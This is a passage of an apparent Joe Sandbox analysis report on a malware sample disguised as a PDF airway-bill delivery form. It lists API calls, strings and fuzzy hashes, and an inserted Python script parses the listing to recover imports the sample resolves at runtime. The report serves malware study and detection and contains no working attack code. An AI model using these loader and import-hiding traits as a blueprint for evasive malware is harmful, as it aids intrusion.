                                                                                          • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0293A76A
                                                                                          Similarity
                                                                                          • API ID: InfoLocale
                                                                                          • String ID:
                                                                                          • API String ID: 2299586839-0
                                                                                          APIs
                                                                                          • GetVersionExA.KERNEL32(?,0295C106,00000000,0295C11E), ref: 0293B722
                                                                                          Similarity
                                                                                          • API ID: Version
                                                                                          • String ID:
                                                                                          • API String ID: 1889659487-0
                                                                                          APIs
                                                                                          • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0293BDFA,00000000,0293C013,?,?,00000000,00000000), ref: 0293A7AB
                                                                                          Similarity
                                                                                          • API ID: InfoLocale
                                                                                          • String ID:
                                                                                          • API String ID: 2299586839-0
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: LocalTime
                                                                                          • String ID:
                                                                                          • API String ID: 481472006-0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                          • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                                                          • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                          • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                                                          APIs
                                                                                          • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0293D225
                                                                                            • Part of subcall function 0293D1F0: GetProcAddress.KERNEL32(00000000), ref: 0293D209
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressHandleModuleProc
                                                                                          • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                          • API String ID: 1646373207-1918263038
                                                                                          • Opcode ID: 617cf56d1f4866a89d874227860a2e995ef6eafddc51f0ebdaf86850e09e7bda
                                                                                          • Instruction ID: ca34bed7167dee6bf4cc8a73deb60c6416335c1665a9048e47f36266c772e8de
                                                                                          • Opcode Fuzzy Hash: 617cf56d1f4866a89d874227860a2e995ef6eafddc51f0ebdaf86850e09e7bda
                                                                                          • Instruction Fuzzy Hash: A541E562A883455B560BBAAD742453B7BDEEB88730360451BB41CDA685DE30BC618E3D
                                                                                          APIs
                                                                                          • GetModuleHandleA.KERNEL32(ole32.dll), ref: 02946E66
                                                                                          • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02946E77
                                                                                          • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02946E87
                                                                                          • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02946E97
                                                                                          • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02946EA7
                                                                                          • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02946EB7
                                                                                          • GetProcAddress.KERNEL32(?,CoSuspendClassObjects), ref: 02946EC7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressProc$HandleModule
                                                                                          • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                                          • API String ID: 667068680-2233174745
                                                                                          • Opcode ID: c2c90094aa0ef080fa94aa202237674de04fca2b830f1ff385961db29b29c9b0
                                                                                          • Instruction ID: 87296c6d03d97a10d5fed9dd9565e52b8b15c44da45c63936b31decc584c7e2c
                                                                                          • Opcode Fuzzy Hash: c2c90094aa0ef080fa94aa202237674de04fca2b830f1ff385961db29b29c9b0
                                                                                          • Instruction Fuzzy Hash: D6F050E2B8D7217EB7027F709C81C37279D95D268C7001965744255942DEB588604F68
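The two entries above (the oleaut32.dll and ole32.dll resolvers) show the sample locating exports at runtime with GetModuleHandleA plus GetProcAddress rather than through the PE import table, so a static import listing understates what the code can call. The following Python is an added example, not part of the Joe Sandbox report or of the sample: it parses the report's own "APIs" call-site lines and the "String ID" token list of each function entry and rebuilds a module-to-exports map of what was resolved dynamically. The sample input is constructed from the two entries printed above; the regular expressions assume the exact "Func.MODULE(args), ref: ADDR" layout used in this report and nothing else.

```python
"""Recover dynamically resolved imports from a Joe Sandbox function listing.

Added example (not part of the Joe Sandbox report). Parses the "APIs" call
sites and "String ID" token lists shown in this report's function entries.
"""
import re
from collections import defaultdict

# Constructed sample: the oleaut32 and ole32 entries from this report, copied
# as printed (report indentation removed, unrelated lines omitted).
SAMPLE_LISTING = """\
APIs
• GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0293D225
  • Part of subcall function 0293D1F0: GetProcAddress.KERNEL32(00000000), ref: 0293D209
• String ID: VarAdd$VarAnd$VarBoolFromStr$VariantChangeTypeEx$oleaut32.dll
• Instruction Fuzzy Hash: A541E562A883455B560BBAAD742453B7BDEEB88730360451BB41CDA685DE30BC618E3D
APIs
• GetModuleHandleA.KERNEL32(ole32.dll), ref: 02946E66
• GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02946E77
• GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02946E87
• GetProcAddress.KERNEL32(?,CoSuspendClassObjects), ref: 02946EC7
• String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoSuspendClassObjects$ole32.dll
• Instruction Fuzzy Hash: D6F050E2B8D7217EB7027F709C81C37279D95D268C7001965744255942DEB588604F68
"""

# One call site as the report prints it: "Func.MODULE(arg,arg), ref: ADDR".
CALL_RE = re.compile(r"(\w+)\.(\w+)\(([^)]*)\), ref: ([0-9A-Fa-f]{8})")
STRING_ID_RE = re.compile(r"String ID:\s*(.*)$")
PLACEHOLDER_RE = re.compile(r"\?|[0-9A-Fa-f]{8}")  # unresolved or numeric argument
IDENT_RE = re.compile(r"[A-Za-z_]\w*")              # plausible export name


def split_entries(text):
    """Yield one list of lines per function entry.

    Each entry in the report closes with its "Instruction Fuzzy Hash" line,
    so that line is used as the delimiter; a trailing partial entry is kept.
    """
    entry = []
    for line in text.splitlines():
        entry.append(line)
        if line.strip().startswith("• Instruction Fuzzy Hash"):
            yield entry
            entry = []
    if entry:
        yield entry


def summarize_dynamic_imports(text):
    """Map module name -> set of export names resolved via GetProcAddress.

    Export names come from GetProcAddress arguments when the sandbox resolved
    them, and from the entry's "String ID" tokens otherwise (the oleaut32 stub
    resolves its names in a loop, which the listing shows as one call with an
    unresolved argument).
    """
    result = defaultdict(set)
    for entry in split_entries(text):
        module, exports, saw_gpa, tokens = None, set(), False, []
        for line in entry:
            call = CALL_RE.search(line)
            if call:
                func, _mod, raw_args, _ref = call.groups()
                args = [a.strip() for a in raw_args.split(",")] if raw_args else []
                if func.startswith("GetModuleHandle") and args and not PLACEHOLDER_RE.fullmatch(args[0]):
                    module = args[0].lower()
                elif func == "GetProcAddress":
                    saw_gpa = True
                    if len(args) > 1 and not PLACEHOLDER_RE.fullmatch(args[1]):
                        exports.add(args[1])
                continue
            sid = STRING_ID_RE.search(line)
            if sid:
                tokens = [t.strip() for t in sid.group(1).split("$")]
        if not saw_gpa:
            continue  # only static imports here; nothing hidden from the import table
        for tok in tokens:
            if tok.lower().endswith(".dll"):
                module = module or tok.lower()
            elif IDENT_RE.fullmatch(tok):
                exports.add(tok)
        if module:
            result[module] |= exports
    return dict(result)


if __name__ == "__main__":
    for mod, names in sorted(summarize_dynamic_imports(SAMPLE_LISTING).items()):
        print(f"{mod}: {', '.join(sorted(names))}")
```

Read the result with one caveat in mind: the VarAdd/VarAnd/.../VariantChangeTypeEx set from oleaut32.dll and the CoCreateInstanceEx/CoInitializeEx/Co*ServerProcess/Co*ClassObjects set from ole32.dll are exactly the late-bound lists of the Delphi runtime's own variant and COM support units, and the "Unexpected Memory Leak" and "Runtime error at 00000000" strings in the neighbouring entries are Delphi RTL/FastMM messages as well. They identify the compiler, not loader functionality, and appear in benign Delphi programs; the "ref:" addresses place them in the unpacked region at offset 02930000 noted in the Memory Dump Source lines, so the same map is worth building over the whole report to see which resolved names are not accounted for by the runtime.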
                                                                                          APIs
                                                                                          • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 029328CE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: Message
                                                                                          • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                                          • API String ID: 2030045667-32948583
                                                                                          • Opcode ID: d7758e1d48801f5972e78e8f64d8277d2e642aa9d20c45163caaac10faa34d18
                                                                                          • Instruction ID: 5ea9a82ee32ca42fddbda070bdbccad8258cfc7b9dd851acd0c20541d7928982
                                                                                          • Opcode Fuzzy Hash: d7758e1d48801f5972e78e8f64d8277d2e642aa9d20c45163caaac10faa34d18
                                                                                          • Instruction Fuzzy Hash: 54A1E330E043648BDF22AB2CCC84B99B7E9EB49714F1440E5ED49AB285CB759EC9CF51
                                                                                          Strings
                                                                                          • , xrefs: 02932814
                                                                                          • 7, xrefs: 029326A1
                                                                                          • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02932849
                                                                                          • bytes: , xrefs: 0293275D
                                                                                          • An unexpected memory leak has occurred. , xrefs: 02932690
                                                                                          • The unexpected small block leaks are:, xrefs: 02932707
                                                                                          • Unexpected Memory Leak, xrefs: 029328C0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                                          • API String ID: 0-2723507874
                                                                                          • Opcode ID: 9be25cf62253027e4e79c09b2bc0c21d78c98b918f4e07fa2ced92a50e432b95
                                                                                          • Instruction ID: fae0dbd35f9c2ed9964267dfa90403860c6951b0d40e4c70c8954f9fc147812d
                                                                                          • Opcode Fuzzy Hash: 9be25cf62253027e4e79c09b2bc0c21d78c98b918f4e07fa2ced92a50e432b95
                                                                                          • Instruction Fuzzy Hash: 3071A130E042A88FDB229B2CCC84BD9BAE9EB49714F1441E5D949DB281DB754EC5CF51
                                                                                          APIs
                                                                                          • GetThreadLocale.KERNEL32(00000000,0293C013,?,?,00000000,00000000), ref: 0293BD7E
                                                                                            • Part of subcall function 0293A74C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0293A76A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: Locale$InfoThread
                                                                                          • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                          • API String ID: 4232894706-2493093252
                                                                                          • Opcode ID: b24a03acc283a7e7704c18a8986b3e0d2ceae3735ef1a3def0c10760fbc89c4d
                                                                                          • Instruction ID: 2a4fb9d5847d75f9fb9daceff3f457c2d0bd3b4fa47beca676bf3e9cbe4de0ab
                                                                                          • Opcode Fuzzy Hash: b24a03acc283a7e7704c18a8986b3e0d2ceae3735ef1a3def0c10760fbc89c4d
                                                                                          • Instruction Fuzzy Hash: 05613F35B042489BDB02EBA8D890ADFB7FB9FC9310F50A476E101EB345DA35DD058B95
                                                                                          APIs
                                                                                          • IsBadReadPtr.KERNEL32(?,00000004), ref: 0294AE40
                                                                                          • GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 0294AE57
                                                                                          • IsBadReadPtr.KERNEL32(?,00000004), ref: 0294AEEB
                                                                                          • IsBadReadPtr.KERNEL32(?,00000002), ref: 0294AEF7
                                                                                          • IsBadReadPtr.KERNEL32(?,00000014), ref: 0294AF0B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: Read$HandleModule
                                                                                          • String ID: KernelBase$LoadLibraryExA
                                                                                          • API String ID: 2226866862-113032527
                                                                                          • Opcode ID: 2ef5d94cf4626bad99bef01e2c444f219d98e8d82fafffb99506b991db7d9943
                                                                                          • Instruction ID: 9ace47e4a349f14ff2091f9d9e9eb2fee400514bda06a1aed014e614422964e0
                                                                                          • Opcode Fuzzy Hash: 2ef5d94cf4626bad99bef01e2c444f219d98e8d82fafffb99506b991db7d9943
                                                                                          • Instruction Fuzzy Hash: 8C3188B2A84305BBEB20DF58CC95F5A77ACAF45768F004664FA54EB280DB70E940DB64
                                                                                          APIs
                                                                                          • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029343F3,?,?,029907C8,?,?,0295D7A8,0293655D,0295C30D), ref: 02934365
                                                                                          • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029343F3,?,?,029907C8,?,?,0295D7A8,0293655D,0295C30D), ref: 0293436B
                                                                                          • GetStdHandle.KERNEL32(000000F5,029343B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029343F3,?,?,029907C8), ref: 02934380
                                                                                          • WriteFile.KERNEL32(00000000,000000F5,029343B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,029343F3,?,?), ref: 02934386
                                                                                          • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 029343A4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileHandleWrite$Message
                                                                                          • String ID: Error$Runtime error at 00000000
                                                                                          • API String ID: 1570097196-2970929446
                                                                                          • Opcode ID: 571ec5cf9983abd16aa35deeed9776c3eee620c4965a5666c5b89ab68425cd3a
                                                                                          • Instruction ID: 7fe7bf3763e06e01a06758fc57d915549dc7539169f4c5b2c27679d77299e72f
                                                                                          • Opcode Fuzzy Hash: 571ec5cf9983abd16aa35deeed9776c3eee620c4965a5666c5b89ab68425cd3a
                                                                                          • Instruction Fuzzy Hash: D1F0B4A1BC83407AFA12B6A0AD56FB9275D4BC5F24F180A04F664A60D0C7A0A0C4CB27
                                                                                          APIs
                                                                                            • Part of subcall function 0293ACC4: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0293ACE1
                                                                                            • Part of subcall function 0293ACC4: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0293AD05
                                                                                            • Part of subcall function 0293ACC4: GetModuleFileNameA.KERNEL32(02930000,?,00000105), ref: 0293AD20
                                                                                            • Part of subcall function 0293ACC4: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0293ADB6
                                                                                          • CharToOemA.USER32(?,?), ref: 0293AE83
                                                                                          • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0293AEA0
                                                                                          • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0293AEA6
                                                                                          • GetStdHandle.KERNEL32(000000F4,0293AF10,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0293AEBB
                                                                                          • WriteFile.KERNEL32(00000000,000000F4,0293AF10,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0293AEC1
                                                                                          • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 0293AEE3
                                                                                          • MessageBoxA.USER32(00000000,?,?,00002010), ref: 0293AEF9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 185507032-0
                                                                                          • Opcode ID: c03d079ae092b0d201b7e4060b71677825e1988effaa8ce23abbff33cf283879
                                                                                          • Instruction ID: 581698b1d949876942a36ddf7b6a4e7e164f27ca2b31f7031466f72c4667553e
                                                                                          • Opcode Fuzzy Hash: c03d079ae092b0d201b7e4060b71677825e1988effaa8ce23abbff33cf283879
                                                                                          • Instruction Fuzzy Hash: F21170B25483047AD202FBA4CC80F9B77EDAB84700F40092AB395D60D1DA74E9448F26
                                                                                          APIs
                                                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0293E5AD
                                                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0293E5C9
                                                                                          • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0293E602
                                                                                          • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0293E67F
                                                                                          • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0293E698
                                                                                          • VariantCopy.OLEAUT32(?,00000000), ref: 0293E6CD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                          • String ID:
                                                                                          • API String ID: 351091851-0
                                                                                          • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                          • Instruction ID: 026845b766f3cb3c8473be3e34976d46bb5fec3c7af1af6cb05fc4f4d08a9dd9
                                                                                          • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                          • Instruction Fuzzy Hash: CE51D676A0062D9BCB26EB98C890BD9B7FDAF8C304F4041E5E549E7241D670AF858F61
                                                                                          APIs
                                                                                          • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0293358A
                                                                                          • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,029335D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 029335BD
                                                                                          • RegCloseKey.ADVAPI32(?,029335E0,00000000,?,00000004,00000000,029335D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 029335D3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseOpenQueryValue
                                                                                          • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                          • API String ID: 3677997916-4173385793
                                                                                          • Opcode ID: da6741221d93c94468950e3a57c98c057bc818f8088962c45e155b7a7721fcb7
                                                                                          • Instruction ID: 17497ce8b73b05fc0446095ff1ad9cae0427b547bc4b911cc05a6f35fb133650
                                                                                          • Opcode Fuzzy Hash: da6741221d93c94468950e3a57c98c057bc818f8088962c45e155b7a7721fcb7
                                                                                          • Instruction Fuzzy Hash: B801D876A84318BAF712DBA0CD02BBD77ECEB49710F1005A1BA04D65C0E6749610DBA8
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02948150,?,?,00000000,00000000,?,02948069,00000000,KernelBASE,00000000,00000000,02948090), ref: 02948115
                                                                                          • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 0294811B
                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 0294812D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmp
